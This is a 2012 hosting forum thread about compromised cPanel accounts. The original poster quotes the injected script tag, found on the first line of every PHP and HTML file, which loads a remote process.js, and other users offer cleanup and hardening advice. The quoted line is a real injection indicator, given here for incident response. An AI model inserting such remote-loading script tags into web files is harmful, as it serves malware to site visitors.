The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

security problem, php and html files vulnerability

Discussion in 'Security' started by upsforum, Jun 27, 2012.

  1. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    from 2 days I have a problem with some accounts on my some vps with cpanel.

    I must find and replace specific string in all accounts, I find in all files php and html on some ftp root this:

    <script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>

    in first line for every file and I must run a conbination od find and sed command for remove it
     
  2. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    for security I change some account passoword but I checked ftp log and not see activity from this
     
  3. qwerty

    qwerty Well-Known Member

    Joined:
    Jan 21, 2003
    Messages:
    213
    Likes Received:
    0
    Trophy Points:
    16
    It sounds like your server may have been rooted/compromised. Try and contact Steve at
    /http://www.rack911.com/
     
  4. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    I use Centos 6 and suPHP module
     
  5. qwerty

    qwerty Well-Known Member

    Joined:
    Jan 21, 2003
    Messages:
    213
    Likes Received:
    0
    Trophy Points:
    16
    that makes no difference whatsoever. If all of your sites are serving malware the server has most likely been compromised in some way, possibly rooted. You need an expert to look at it and help you get it up and running normally again...and secure it against future problems.
     
  6. d'argo

    d'argo Active Member

    Joined:
    Jul 4, 2012
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    If all the domains on the same server were not effected then the server isnt owned, the domains have been compromised. Which usually means the passwords for those passwords were stolen from infected desktops. Check your logs, particularly youre ftp logs, to see if these files are just being uploaded. If they are, its stolen credentials and fairly easy to fix, just change the users passwords and restore the domain files from good backups.

    If every domain on the same server is effected the server might be owned. If you arent sure, reinstall the entire box from scratch and lock it down, or hire someone to lock it down. Trying to clean up an owned server is next to impossible, especially if a kernel rootkit got installed.
     
  7. PlotHost

    PlotHost Well-Known Member

    Joined:
    Apr 29, 2011
    Messages:
    253
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    US
    cPanel Access Level:
    Root Administrator
    Twitter:
    You should also install mod_security w/ atomic rules. Also always update your scripts to the latest versions.
     
  8. konrath

    konrath Well-Known Member

    Joined:
    May 3, 2005
    Messages:
    367
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brasil
    Hello

    verify is enable_dl is on in php.ini. If on, then turn to off

    Thank you
    Konrath
     
  9. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    SuPHP is substantially better than DSO (mod_php) but doesn't in itself prevent any cross-site injection or scripting.

    The problem you have described originates from an exploit from a vulnerable web script usually either an old version of OsCommerce or an old version of Wordpress about 70% of the time.

    Most of the other 30% typically originates from the user being compromised with a trojan at home that allows the hackers to just simply steal their passwords from their own computers.

    Once a single site has successfully been compromised, it is generally trivial to compromise the rest of the hosting accounts from within the server unless really hardcore security measures have been actively put into place --- for most hosting administrators on average, they probably haven't done that.

    The discussion of what all you need to do to properly lock down your server correctly is much too lengthy to really be able to write in a single forum post and would be an extended discussion in and of itself.

    What I would recommend doing in the immediate right now before looking into any of that, is first get all your client's web scripts and applications fully up to the minute up to date with the newest versions and don't allow anyone to run anything that is in any way significantly old ---- allowing clients to run old scripts is just asking for trouble in itself.
     
Loading...

Share This Page